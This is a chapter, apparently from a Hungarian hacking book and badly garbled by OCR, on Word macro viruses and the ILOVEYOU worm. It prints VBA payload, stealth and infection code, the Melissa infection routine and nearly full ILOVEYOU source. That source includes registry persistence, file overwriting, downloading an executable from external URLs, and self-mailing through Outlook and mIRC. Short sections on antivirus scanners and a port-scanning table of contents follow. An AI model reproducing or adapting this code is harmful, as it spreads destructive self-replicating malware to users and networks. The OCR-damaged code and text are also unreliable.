Controls(''Style. Ezen a helyen a ritkán használt parancsok elrejtése a Word 2000-ben különösen végzetesen hat: a felhasználó e beállítás miatt egyáltalán nem vesz észre bizonyos beavatkozási lehetőségeket. . és sokkal tovább marad észrevétlen. VirusProtection = False Eltávolítja a vírusvédelmet. aki jól kiismeri magát a Wordben. hogy azt a felhasználó észrevenné. Sub FileTemplates( ) On Error Ressume Next End Sub A felhasználó nem tudja elindítani a Sablonok és bővítmények ablakot. a hiányát csak az veszi észre. Természetesen a rendszeres összehasonlítás egy véletlenszámmal is lehetséges. amely alapértelmezésben rákérdez a Normal. CommandBars(''Tools").5 Ilyet is lehet: a vírus egy Payload-ot hív meg Hogy a vírus ne legyen azonnal aktív.tehát azt jelentené. akkor menj a payloadra. Sub WordBasic. SubViewVBCode( ) On Error Resume Next End Sub A felhasználó nem tudja elindítani a VB editort. Controls("Templates and Add-lns.Controls(''Macro"). a következő paranccsal lehet kikapcsolni a Registry-ből. ha nem lehet a menükből elindítani a megfelelő funkciókat. kattint. A fertőzésszámláló pontosan ezt a lehetőséget kínálja. A rejtőzködéshez bizonyos menüparancsok kikapcsolása is fontos..Delete * Kiveszi a stílusokra vonatkozó menüparancsokat. CommandBars(''Format").dot mentésére.. Ha a szám és a változó megegyeznek.. Fontos még: mivel ennek a funkciónak a kikapcsolása a háttérben történik. CommandBars("Tools"). "). amely egy 0-100 közti számot tartalmaz. A vírus eltávolítja ezeket a bejegyzéseket.Delete Kiveszi a makrókra vonatkozó menüparancsokat. egy folyamatellenőrzési lehetőséggel is fel van ruházva."HKEY_CURRENT_USER\Software\ Microsoft\Office\9. „Levél") = /& A Programhiba esetén az On Error Resume Next -tel egyszerűen továbbfut. akkor menj a Payloadra.SaveNormalPrompt = False Ezzel a paranccsal kikapcsolja a párbeszédablakot. A megfelelő kódsorok egyszerű If lekérdezések. hogy a makrovírust elrejtjük. A felhasználó nem láthatja a párbeszédmezőt.. Ugyanígy egy bizonyos napot is lehet használni. If Month(Now( )) = l And Day(Now( ) = l Then Call Payload 'Ha az aktuális dátum január L.dot-ot. If x = 3 then Call Payload 'Ha x. azután nullánál megtörténik a gonoszkodás.0\\Word\SecTírity". "). System. amelyekkel a Word a dokumentumokban előforduló makrókra reagál.DisableAutoMacros = 0 End Sub Az automakrók inaktívvá válnak. Ehhez el kell helyezni egy kulcsot valahol a Registry-ben. ami megvalósítható néhány programsorral. akkor következik be az esemény: x=Int(Rnd * 100) 'X egy változó. Sub ToolsMacro( ) On Error Resume Next End Sub Ha a felhasználó az Eszközök/Makró/Makrók-ra. hogy a makrókat lefuttassa-e. 5.PrivateProfileString("". menj a Payloadra. Options. If Month(Now( )) = l And Day(Now( ) = l Then Call Payload 'Ha az aktuális dátum január 2. Ez úgy megy a legegyszerűbben. Options. lefut ez a sub. így anélkül lehet megváltoztatni a Normal.5. A Word kérdését..Delete Kiveszi a sablonokra és a bővítményekre vonatkozó menüparancsokat.

Az osztálymodulok a felhasználó számára nem olyan könnyen felismerhetők.Find:ExecuteReplace:=wdReplaceAll CommandBars("edit"). hogy mindig új fertőzési módokat találjanak ki.MatchCase = False ..Wrap = wdFindContinue ..Delete If ActiveDociment.Delete CommandBars(''edit").Controls("Replace.Controls("Repeat" Replace.")..Subject = "Tárgy" .7 A vírus jelszóval védi a fájlt A jelszavas védelmet is be lehet kapcsolni egy makrovírussal: Sub Payload( ) ActiveDocument.5.Execute End With End Sub Ugyanígy szavakat is kicserélhetünk Word parancsok segítségével.Save End Sub 5.Keywords = "Keresőszó" . Százszázalékos védelem nem létezik. Sajnos. amelyeket az időzített kioldó vált ki. és használjuk minden alkalommal. Például megváltozhatnának a dokumentum-tulajdonságok: hirtelen egy Dagobert kacsa írta a levelet vagy ilyesmi: Sub Payload( ) ActiveDocument. egyes vírusprogramozók sportot űznek abból.Controls("UndoVBA-Find. hanem beolvassák a kódot. ami sokkal nehezebbé teszi a vírus felfedezését.Text = "Mire cseréli" 'amire cseréli . amelyeknek magunk írhatjuk a forráskódját.Author = "Szerző" . End Sub Ezentúl biztosan másképpen fogják kezelni a Word-figyelmeztetést. vagyis egy objektumot definiálunk tulajdonságokkal és eljárásokkal. A kedvelt Keresés-Csere funkció most a vírust segíti: Sub Payload( ) On Error Resume Next Selection. 5. mert a makrókhoz és sablontartalmakhoz tartozó Makró és a Szervező ablakban nem mutatja őket a program.MatchWholeWord = True . és ezt a sztringet illesztik be egy másik osztálymodulba. úgy találja meg ezt a párbeszédablakot.Text = "Mit keres" 'a cserélendő szöveg . de hatékony megelőzés azért lehetséges. mint a vezérlőelemek. ha kapunk egy Word vagy Excel dokumentumot. ha az Eszközök/Makró/Makrók Szervezőre kattint..Format = False . Az osztálymodulok ezért ugyanazokkal a tulajdonságokkal rendelkeznek.5.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg A Payload mögött különféle ténykedések rejtőzhetnek.HomeKey Unit:=wdStory Selection. A vírusvizsgálónk legyen mindig a legfrissebb. A víruskód .Forward = True .ClearFormatting With Selectíon. hogy kvázi „láthatatlanok".Execute"). mint az eddig bemutatott makróvírusoké: itt már nem exportálnak és importálnak egy kódot minden jövendőbeli Word fájlba.5.Find . Aki szeretne utánanézni.Saved = False Then ActiveDocument.6 Megfertőzött osztálymodulok A WinWord dokumentumok megfertőzésének egy másik módja az osztálymodulok megfertőzése.Comments = "Megjegyzések" .Replacement.MatchAllWirdForms = False End With Selection. Az osztálymodulok bizonyos mértékig saját meghatározású vezérlőelemek.Find. vállalva a felfedezés veszélyét.Replacement. Az osztálymodulok abban különböznek a felhasználó által meghatározott vezérlőelemektől.Delete CommandBars("edit"). ").ReadOnlyRecommended = False With Dialogs(wdDialogFileSummaryInfo) .Password = "hallo" 'Persze lehet véletlenszerű jelszót is csinálni. Az osztálymodulok megfertőzésének a stratégiája más.Title="Cím" .

.. ha egy dokumentumot megnyitnak. ' Source. hogy már az aktuális dokumentum is ' fertőzött. VBProject.Lines(az l. Source.CodeModule Set Target = NormalTemplate.. De lehetséges. Az 1. End With Egy igazi vírus persze sokkal nagyobb ennél. ' ActiveDocument. ' Tehát ott van. Ha ezt valaki elfelejti. CodeModule ' Az indexszám l a VBComponents(l)-nél mindig a „ThisDocument" osztálymodul.CodeModule Set Target = ActiveDocument..VBComponents(1). VBComponents(l). A kód beolvasásához tehát ki kell találni. sortól beolvasni. hogy ott már semmi sincs. Ezt ebben a példában nem ellenőrizzük. hogy előzőleg törölnénk ' a sorokat. ' hogy ha ott egy másik vírus volt. amilyen hosszú a modul). Private Sub Document_Open( ) ' Ez a Sub mindig lefut.dot-ból jön. On Error Resume Next ' a szokásos történet a hibával MyPos = ThisDoaiment. ' mert minden kód megfertőzésénél azok. Else ' ha nem a Normal.' annyi sort kell törölni. és még Stealth-funkciókat is tartalmaz.VBComponents(l)... nem pedig ' AutoOpen( ).CodeModule 'Ha a Normal.. hol vagyunk (a Normal. és csak a dokumentumban vagy a Normal. kommentárokkal a kódban.VBComponents( l).megnyitáskor láthatatlanul integrálódik minden további dokumentumba. VBProject. hogy világossá tegye a mögötte rejlő meggondolásokat. With Target .VBProject.dot-ban vagyunk.. anélkül. amilyen hosszú a modul. ' . hogy a vírus végrehajtódik. amelyek előzőleg ott voltak. abból azután már logikusan következik. és beírjuk a modulba. íme egy példavírus. Ha a vírus ott már .Name ' Mivel nem tudjuk. Így ez csak elpazarolt processzoridő. .. . hogy Source.dot-ban vagyunk. hogy mit kell megfertőzni.CountOflines) End With ' Ha egy objektumot egy With. akkor nincs szükség ' az objektumnév ismétlésére. sortól kezdve. ' amelyet meg kell fertőzni. ezt az új felülírja. ' Az l. VBProject.DeleteLines l. Egy osztálymodulban mindennek ' Private-nak kell lennie.. A programozás stuktúrájához egyszerűen azt kell elképzelni.dot-ban lehet. az hibaüzenethez vezetne.CountOflines ' A megfertőzendő fájlban minden sort törölni kell. VirCode ' A beolvasott sztring beillesztése a modulba.dot-ban vagy a dokumentumban) 'a ThisDocument.' megtalálható lenne.CountOflines adja vissza a sorok/Lines számát a modulban. ' A Sub neve is megváltozott. . sortól kezdve. Most Document_Open( ) a neve.Name adja a választ If MyPos = „Normal. hogy az aktuális dokumentumot kell ' megfertőzni.' Ezzel biztosak lehetünk abban. tudjuk. és hogy a víruskód a Normal.. már csak egy lehetőség marad hátra Set Source = ActiveDocument.Lines(l.dot" Then Set Source = NormalTemplate.Lines(l. .End With-blokkba zárunk. és VirCode a sztring. hogy hol vagyunk.VBProject.CodeModule End If With Source VirCode = . . Ez azonban azt is jelenti.InsetLines l. annak fertőzésnél azonnal hibát jelez. annyi sort.. VBComponents(1).CountOflines) ' Most a teljes víruskód a VirCode-ba lesz beolvasva. ' Figyelembe kell venni. törölve ' lesznek. hogy a SUB Priváté. ' Létrehozzuk a változóinkat.

Az alábbiakban egy példával világítjuk meg.VBComponents. NTCL SetToInfect = NTIl NTILName = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do WhileADIl.VBComponents.DeleteLines l.VBProject.Lines(1.VBProject.Item(l) -re. "Document") = False) Then ActiveDocument. 1) ="" ADIl.Lines(1.Item(l)-re. és a hálóra csatlakoztatott cégek 90% -át megfertőzte.CodeModide-.CodeModule. A LoveLettert először 2000.Lines Loop ToInfect.CodeModule.7 ILOVEYOU A LoveLetter egy VBS-féreg (Vimal Basic Script) amely e-mailen keresztül terjed.Lines(BGN.VBProject. „Document") <> False) Then ActiveDocument.InsertLines BGN.CountOfLines BGN =2 If ADILName <> "Melissa" Then IfADCL>OThen_ ADIl.CountOfLims ADCL = ADIl. NTCL = Hni. Set NTI1 NormalTemplate.Lines(BGN. 1) BGN = BGN + l Loop End If If DoAD = True Then Do While NTIl. VBProject.CodeMOdule.DeleteLines l.InsertLines EGN. Most minden idők egyik legveszélyesebb vírusát fogjuk alaposabban szemügyre venni.CodeModule. ADIl.FullName Elself (InStr(l.CodeModule.CodeModule.CodeModule.AddFromString ("Private Sub Document_Close( )") End If CYA: Do While ADIl. Néhány órán belül világszerte elterjedt.CodeModule.CodeModule.AddFromString ("Private Sub Document_Open( )") Do While NTIl. 1) <> "" ToInfectCodeModule. ActiveDocumentName.Lines(BGN. ADCL SetToInfect = ADIl ADILName = "Melissa" DoAD = True End If If NTILName <> "Melissa" Then If NTCL >0 Then _ NTIl. mellékletként.VBComponents. ActiveDocumentName. hogyan fertőzi meg az osztálymodulatokat a Melissa: CUT HERE Priváté Sub Document_Open( ) On Error Resume Next Set ASI1 = ActiveDocument. 1) = "" NTIl.SaveAsFileName:=ActiveDocument.CodeModule.CodeModule. 1) BGN = BGN +l Loop If NTCL <> 0 And ADCL = 0 And (InStr(l.CodeModule.Item(l) 'Állítsd SetNTIl-et NormalTemplate.Lines(BGN.Item(l) 'Állítsd ADIl-et ActiveDocument.NTIl. VBComponents.DeleteLines l Loop ToInfect.CodeModule.CodeModule. 1) <> "" ToInfect. május 4-én jelezték.Saved = True End If End Sub CUT HERE 5. .

Sok cég megelőzésképpen leválasztotta mailszerverét a netről.e.. . amelyeket azonban hamarosan nem lehetett elérni. Ugyanott a féreg a WIN-BUGSFIX programot is le akarta tölteni. Úgy módosította a mIRC script. illetve elrejtette az . .trajan-by spyder. mivel ezekbe a statisztikákba nem kerülnek be a magánfelhasználók gépei.hta.. hogy egy csatorna minden látogatója. Így nagy forgalom keletkezett a cégek belső hálózati mailszerverein. Miközben a féreg aktív volt.send.1 Mi az a féreg? A féreg egy darabkányi kód. Ebben az esetben gyorsan be kellett zárni ezt a feladatot.2 A működési mód Az ILOVEYOU féreg egy weboldalról töltött le egyes bannereket. a Sky Internet Inc. Yeah another time to DEATH. és törölte a webhelyet. .. legfeljebb magas forgalmat (traffic) generál.mp2 fájlokat.jse. A legdestruktívabb azonban az a tény volt. . .5. • LOOK! • How to protect yourself from the ILOVEYOU bug! Az Amable Mendoza Aguila Computer College-ben. gyorsan kapcsolt. hogy minden js.passwords. mivel a Fülöp-szigetek-i szolgáltató.jpg fájlt használhatatlanná tett. a Spyder nevet használó hacker munkahelyén 10 személyt gyanúsítottak azzal. automatikusan elküldte magát a címjegyzék e-mailcímeire.. mint az ILOVEYOU esetében. vagy a gépet is rögtön kilőni! A féregnek egy variánsa aktiválta a jelszó cache-elést. hivatalos számok szerint. . A féreg az Outlookon és a mIRC-en keresztül is terjedt. a Taskmanager-en is megjelent mint w_srcipt.mp3 és az .1 szoftver fejlesztésében. és ezután a cache-elt jelszavakat elküldte mailben. . Időközben a hackereknek volt idejük. a rendszergazdák félelmeit és feldühítését még egyáltalán nem számoltuk. . és ezeket Access Net accountokra kellett volna küldenie. A féreg. ezzel az üzenettel: Bárok. 600 ezer számítógépet ért el. aminek következtében néhány céges hálózatnak teljes egészében le kellett mondania a mailküldésről.sct. Két prominens áldozat is volt: a ZDF tévéadó és az Expo-világkiállítás. . 5.mail. amely magától terjed az interneten vagy a helyi hálózaton keresztül.ini fájlját. amely jelszavakat kémlel ki. Az eddig ismert változatok: • ILOVEYOU • Susitikim shi vakara kavos puodukui. megkapta a .vbs..er. A károkat több milliárd dollárra becsülték. hogy részt vettek a Bárok 2.. hogy minden döntő bizonyítékot töröljenek a gépeikről.css.7. A vírussal ellentétben a féreg nem közvetlenül rombol. a nem hivatalos számok azonban ennél jóval magasabbak.vbs fájlt. • Joke • Mothers Day Order Confirmation • Dangerous Virus Warning • Vírus ALERT!!! • Important! Read carefully!! • I Cant Believe This!!! • Thank You For Flying With Arab Airlines • Variant Test • Yeah.7.. amelyek között ott volt a fertőzött is.wsh.jpeg. A féreg manipulálta még a következő Registry-bejegyzéseket: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \MSKernel32 HKEY_LOCAL_MACHINE\Sofrware\Microsoft\Windows\CurrentVersion\Run Services\Win32DLL HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \WN-BUGSFIX Miután lefuttatták. A féreg. s ez az érintett szerverek tisztán materiális kiesési ideje. míg a hatóságok napokon át semmit sem tettek.

Az eset egyedüli nyertesei az antivírusok gyártói voltak.COM fájlok jelenthetnek veszélyt. Open TextFile (Wscript.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU. 1) vbscopy=file.vbs") c. rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.GetSpecialFolder(l) Set dirtemp = fso. "REG_DWORD" end if Set dirwin = fso. de hangsúlyozzuk.Philippines Ezek a sorok csak szerzői kommentárok. hogy ActiveX-kontrollok és más scriptek is veszélyesek lehetnek. és a Registry-bejegyzések eltávolítása.dirwin. Ezután definiál néhány változót. Az ILOVEYOU vírus téma a múltban nagyon gyakran szerepelt a médiában.4 A forrás . A vírus a Windows Scripting Host-tal hajtódik végre. nem tudatosulnak a hálóval kapcsolatos veszélyek.vbs") c. hibaüzenet nélkül. 5.dirsystem.EXE vagy a .Regread(''HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptingHost\Settings\Timeout") if (rr>=l) then wscr. főleg az internetes újoncokban. ha minden végfelhasználó tudott volna a Visual Basic Script veszélyeiről.GetSpecialFolder(2) Set c =fso.file. Copy(dirsystem& "\MSKernel32. nemhogy egy analízis háttérinformációkkal a felhasználók számára.rr setivscr=CreateObject("Wscript.vbscopy.ctr. valamint a *.TXT. Ellenintézkedésként ajánlkozik a WindowsScripting hostok eltávolítása uninstall-lal.7.FileSystemObject") set file = f s o . de sehol nem jelent meg róla még felvilágosítás.vbs fájlok törlése a Windows és a Windows/System könyvtárból. ezekkel a változókkal fog a későbbiekben dolgozni.Shell") rr=scr. hogy ebben a formájában teljesen hatástalan.dow eq="" ctr=0 . Az On Error Resume Next-tel a hibakezelést vezeti be: ha a program futtatása közben hiba lép fel.kommentárokkal A továbbiakban az ILOVEYOU vírus forráskódja látható. A következő sorban ez meg is történik: a program az OpenTextFile-lal és az azután következő ReadAll( ) -lal beolvassa magát a memóriába.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout".ScriptFullName) c.ReadAH A program ezután egy FileSystemObject-et (fso) hoz létre.com / ©GRAMMERSoft Group / Manila. On Error Resume Next dimFSO. A célja csak a felépítés bemutatása és kommentálása sorról sorra. a vírus működésére nincs semmilyen hatásuk.0. hogy csak a végrehajtható fájlok. Az. mint az . Ezzel az objektummal lehet fájlokat elérni.GetFile(Wscript.GetSpecialFolder(0) Set dirsystem =fso.Copy(dirwin& "\Win32DLL. ScriptFullname. tehát a szerző mailcíme és álneve. akkor a következő lépéssel kell folytatni. hogy manapság.eq. Sokan azt hitték.vbs") regruns( ) html( ) spreadtoemail( ) listadriv( ) end sub 5. akiknek a részvényei 10%-kal is emelkedtek. Ennek a féregnek semmi esélye sem lett volna.dirtemp.3 Hogyan tudott a féreg elterjedni? A féreg terjedésének az alapja az volt. még nem ismert általánosan. main( ) sub main( ) On Error Resume Next dim Tvscr.7. Set so = CreateObject("Scripting.

exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main \Sart "about:blank" end if end sub A regruns( ) funkciónak különböző feladatai vannak a Registry-ben. és ezt indításkor végrehajtja.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page ". net/ ~yotmg l s/HJKjnwerhjkxcvytwertnMTFwerdsfmhPnjw6581345gvsdfl619njbvYT/ WIN-BUGSFIX. mindkettő a vírus előzőleg létrehozott másolatára mutat. Ezek a fájlok tehát kizárólag a vírust tartalmazzák. "http://www.exe" elseif num = 3 then regcreate "HKCU\Sofrivare\Microsoft\InternetExplorer\Main\Sart Page".vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion \RunServices\Win32DLL ". amihez a következő függvényeket hívja meg: regruns( ).skyinet. A html( ) egy helyi HTML-fájlt helyez el. Először a CreateObject( ) -tel egy Shell objektumot hoz létre . net/~chu/ sdgfhjksdfiklNBmnfgkKLHjkq'wtiiHJBhAFSDGjkhYUgq'werasdjh PhjasfdglkNBhbq'webmznxcbvnmadshfgq'w23146I234iiiylthjg/ WIN-BUGSFIX. amely valójában még egyszer tartalmazza a vírust. a működési módjukkal együtt.Innentől kezdődik a vírus főrutinja. és írni lehet bele.skyinet.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run \ WIN-BUGSFIX". "http://www.TXT.skyinet. Win32DLL. Ki lehet például olvasni a Registry-t. spreadtoemail( ) és listadriv( ).exe")=l) then Randomize num = Int((4 * Rnd) +1 if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page ". A Set parancsokkal kérdezi le a program a Windows könyvtárait (dirwin).vbs. illetve LOVE-LETTER-FOR-YOU.vbs.exe end if end if if (fileexist(dovmread&"\WIN-BUGSFIX. A CurrentVersion/Run alatt két kulcsot hoz létre.exe elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page".net/ ~koichi/jf6TrjkcbGRpGqaql98vbFV5hfFEjbopBdQZnmpOhfgER61b3Vlrvg/ WN-BUGSFIX. valamint a Windows/System (dirsystem) könyvtárat.net/ ~angelcat/skladjflfdjghKJnmtryDGFikjUlyqwrWe546786324hjk4jnHH GbvbmKL/ JKjhkqj3w/ WIN-BUGSFIX. html( ). sub regruns( ) On Error Resume Next Dim num. . Page".dirsystem&"\MSKernel32.downread& "\WIN-BUGSFIX.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\Download Directory") if (downread="") then downread="c:" en if if<fíleexist(dirsystem&"\WinFAT32. hozzákezd az igazi feladatához. "http://www.downread regcreate "HKEY__LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion \Run \MsKernel32 ".vbs.dirwin8í "\Win32DLL. A többi funkciót a forrásszöveg folyamatában magyarázzuk el. MSKernel és Win32DLL név alatt. ami később meg is történik. hogy azután a maga egyik másolatát tegye le a következő neveken: MSKernel32. "http://www.skyinet. Mikor a vírus így bemásolta magát.ez az objektum teszi lehetővé a Windows különböző funkcióinak az elérését.

tehát azt a könyvtárat.DeleteFile(f( ).DeleteFile(f1. ext.vbs") fso.OpenTextFile(f1. Ez a funkció a mappák egyes fájljait szerkeszti. GetFolder(folderspec) set sf=f. amely a meghajtókon található minden mappát megdolgozza.path) next end sub .path) cop.path&".path.path) elseif(ext="jpg") or (ext="jpegn) then set ap=fso.2.vbs") fso. bname. ap.name) if (ext="vbs") or (ext="vbe") then set ap=fso.net lépett.close set cop=fso. hogy a következő rendszerindításkor a vírus ismét elindul.true) ap. Minden fájlt felsorol.copy(f1.net egyik szerverére vezet. Röviddel az ILOVEYOU megjelenése után azonban a skyinet.path. és ezután meghívja a folderlist függvényt. GetExtensionName (f1 . fc. az majd később következik. Ezután a vírus az Internet cache-t keresi. ez a fájl megintcsak bejegyzi magát a Registry-be.s Set dc =fso. f1. OpenTextFile(f1.path.write vbscopy mp3.dc. mp3 set f=fso. ehhez négy különböző oldal szolgál választékul. amelybe a megfelelő fájlokat tölti az Internet Explorer. sub listadriv On Error Resume Next Dim d. Minden oldal a skyinet.vbs") mp3. true) ap. f1. és újból kezdi a működését.GetBaseName (f1.path) elseif(ext="mp3" ) or (ext="mp2") then setmp3=fso.path&". amelyek közül véletlenszerűen választ ki egyet.OpenTextFile(f0). Erről az oldalról azután még egy további fájlt is automatikusan letölt a vírus.close bname=fso. 2. 2.SubFolders infectfiles(f1.write vbscopy ap. egyszerűen a C:-t használja.path) ext=Icase(ext) s=Icase(f( ).CreateTextFile(f1.DriveType = 2 or d.GetFile(f0. hogy a következő Windows-indításnál végrehajtódik. GetFolder(folderspec) set fc =f. Ha a vírus nem talál cache-t.Files for each f1 in fc ext=fso.DriveType=3 Then folderlist(d. s támogatja a vírus működését. úgy. sub folderlist(folderspec) On Error Resume Next Minden mappán végrehajtja az InfectFiles funkciót.write vbscopy ap.write vbscopy ap.A Run alatti bejegyzések a Windows indításakor automatikusan lefutnak.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (Ext="sct") or (ext="hta") then set ap=fso. amelyet meg fog fertőzni: sub infectfiles(folderspec) On Error Resume Next dim f. true) ap. mircfname. Ez azt jelenti.Drives For Each d in de If d.path) set cop=fso. s hogy pontosan mit is tesz.close dim f.path) cop. és eltávolította a szerverről a megfelelő oldalakat. sf for each f1 in sf set f=fso.copy(folderspec& ""&bname& ".FetFile(f1.path) folderlist(f1.patb&"") end if Next listadriv = s end sub Ez a függvény minden meghajtót kilistáz. s. Most a program megváltoztatja az Internet Explorer kezdőlapját.

regv. és ellenőrzik.HTM nevű fájlt küld a csatorna minden felhasználójának. akkor felülírja a script.ini.regad .GetFik(f1.ctrentries. WINDOWS will affect and will not run correctly.http://www. amelyeket a program más pontjain használ fel.WriteLine " n 1 = / i f ( = = ) {halt}" script.WriteLine ".js. ha lefut. if mIRCwill" script.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso. thanks" script.mIRCScript" script.WriteLine "n0=on 1:JOIN:#:{„ script.exe") or (s="mirc.wsh.css stb. mIRC will corrupt.dcc send "&dirsystem&\LOVE_LETTER_FOR_YOU.ini.Shell") regget=regedit. Megkeres minden. ." script.ini. ugyancsak a vírust terjeszti úgy.WriteLine ". WriteLine "..attrihites=att.KhaledMardam-Bey" script." script.ini.set att=fso.ini. com " script. 2.malead.path) att.HTM" script. sub regcreate(regkey.hlp") then set scriptini=fso.Shell") regedit.ini.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.WriteLine ".RegWrite regkey.) fájlt.exe") or (s="mlink32.a. Ez a script.ini-t.. megadott kiterjesztésű (.ctrlists. WriteLine " corrupt. és a saját magáról készített másolattal írja felül ezeket.ini.ini. Ha talál egy mIRC-et (Chat Scriptet).CreateTextFile(folderspec& "\script.ini") script.ini.WriteLine "n3=}" script.FileExist(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if ( f s o .WriteLine "[script] script.WriteLine "n2= /.ini.ini") or (s="mirc. 1.. A következő függvények segédfüggvények. Please dont edit this script. mirc.regualue) Set regedit = CreateObject("Wscript.ini.regedit. .ini") or (s="script.regvalue end sub function regget(value) Set regedit = CreateObject("Wscript.WriteLine ".close eq=folderspec end if end if next end sub Az InfectFiles -nak két feladata van. hogy egy LOVE_LETTER_FOR_ YOU. Ezek a függvények egy Registry-bejegyzést készítenek.WriteLine ".ini. GetFolderExist(folderspec)) then msg = 0 else msg = l end if fileexist = msg end funrtion sub spreadtoemail( ) On Error Resume Next dimx. hogy léteznek-e bizonyos fájlok vagy mappák..b.ini.

amely minden felismerhető vírus nevét és lenyomatát tartalmazza. mint a normál víruskeresésnél.Attachments. csak különböző script-fáljokat írt át. A szkenner ellenőrzi egy fájl vagy egy program kódját.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB"&malead) if(regad="") then set male=out.Sheir) set out=WScript.AddressEntries.Add(malead) male.setregedit=CreateObject("Wscript. A legtöbb vírusvizsgáló frissítésekkel folyamatosan bővíti az adatbázisát. GetNameSpace("MAPI") for ctrlists=1 ro mapi. ehhez a szoftver gyártói saját víruslaborokat tartanak fenn.8 Hogyan működnek a vírusvizsgálók? A vírusvizsgáló egy adatbázist használ.Count malead=a. Count endif next x=l Set out=Nothing Set mapi=Nothing end sub A SpreadToEmail( ) függvény megnyitja a programot.a. akkor ezt összehasonlítja az adatbázis lenyomataival. vbs") male.RegRead(''HKEY_CURRENT_USER\Software\Microsoft\ WAB"&a) if(regv="") then regv=l end if if (int(a. és elküldi magát minden címre. amelyben a Windows minden mailcímet tárol. A szkennermodul a vírusok sztringjeit és viselkedési módját is felismeri. és látogatják az idevágó newsgroupokat. és ezzel potenciálisan olyan vírusokat is leleplezhet. hogy azután a címjegyzékben talált minden címre elküldje a vírus másolatát. hogy folyamatosan tudjanak reagálni az új fenyegetésekre. Az internet-. CreateObject("Outlook. az ILOVEYOU. hogy megállapítsa a víruskódokkal való egyezést. 5.Subject = "ILOVEYOU" male. többnyire csekély.a feldolgozhatatlan mennyiségű e-mail miatt milliós volt. amit talál. az egyszerűsége ellenére. Amint látjuk.Createltem(0) male. Ez a program tulajdonképpeni terjedési módja: lefut. Az eljárás neve Pattern Matching. 1. amelyet a felhasználóknál hátrahagyott.Application ") set mapi=out.8.Count set a=mapi. úgynevezett nyomozócsapatokat foglalkoztatnak.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&:a. Az ilyen szkennelésnél a hibaszázalék magasabb.AddressLisets(ctrlists) regv=regedit. tehát a címjegyzéket (WAB. "REG_DWORD" endif x=x+l next regedit.Send regedit. .Recipients.AddressEntries(x) regad="" regad=regedit. Count>inr(regv)) then for ctrentries=l to a.EXE).Add(dirsystem& "\LOVE-LETTER-FOR-YOU.AddressLists. 5. Csak ezért tudott ennyire gyorsan elterjedni. igazán komplex funkciókkal van felszerelve. TXT." male.AddressEntries. amelyek még nincsenek benne az adatbázisban. A kár. Ha a szkenner megváltoztatott kódot vagy valamilyen egyéb eltérést észlel. AddressEntries.Body =vbcrlf&"kindly check the attached LOVELETTER comingfrom me.RegWrite "HKEY_CURRENT_USER \Software \Microsoft\WAB"&malead. illetve mailszolgáltatók kára viszont .1 Szkennermodul A szkennermodul a vírusok felkutatásáért felelős a merevlemezen.

Ha egy fájlt elindítanak. a fertőzéstől függően. különböző opciói vannak a vírus eltávolítására. az attól függ. azaz áthelyezi egy „karanténkönyvtárba".3 „Fertőtlenítő" Ha a szkenner vírust talál.8. hogy a vírusprogramtól függő mértékben visszafogja a rendszerteljesítményt. hogy valamiképpen megtisztítsa. Ennek a modulnak. jelentést tesz.8. A hátránya. hogy valós időben. ez a modul lép akcióba. vagy a szkennelés leállítja a rendszert? • Felismeri-e a program a vírusokat már letöltés közben? • Meg tudja-e találni a szoftver tömörített fájlokban is a vírusokat? • Tudja-e ellenőrizni az e-mailhez csatolt fájlokat (attachments) már az elindításuk előtt? A kezelése kényelmes.2 Víruspajzs A víruspajzs egy memóriarezidens. A következő szempontokra kell ügyelni: • A kínált programfrissítési gyakoriság (legjobb hetente egyszer) • Az ügyféltámogatás minősége • Szkennelési sebesség • Szkennelési minőség • Lehetséges-e a szkennelés a háttérben. a víruspajzs azonnal megvizsgálja. vagy feleslegesen bonyolult? . hogy milyen nagy a fertőzés kockázata. 5. és ha szükséges. átnevezik vagy letöltik a hálóról. 5. ha nincs rá lehetősége. vagy elkülöníti. Vagy megtisztítja a fájlt a vírustól. folyamatosan kövesse a felhasználók minden fájlelérését. vagy törli a fájlt.4 A vírusvédő program kiválasztásának a szempontjai Hogy mennyit akarunk vagy kell ráfordítanunk egy-egy virusvizsgálóra.5. Úgy van beállítva.8. a háttérben működő szkenmodul. kijelölnek. és mennyibe kerülne az adatok újbóli előállítása.

2.2.2. 6.2.2.2.6 UDP-Recvfrom-And-Write szkennelés 6.1 Szkenneles teljes TCP-kapcsolattal 6.2 Félig nyitott TCP-szkennelés 6.2.5 UDP-ICMP-Port-Unreachable szkennelés 6.6.2.2.1.Tartalom 6.3 TCP-FIN-Scan 6. fejezet .4 Fragmentált szkennelés 6.8 A nyitott portok csak a kezdetet jelentik 6. A szkenner Szkennelesi eljárások 6.9 A portszkennelés elleni védelem .2.7 ICMP-echo-scanning/ping-szkennelés 6.

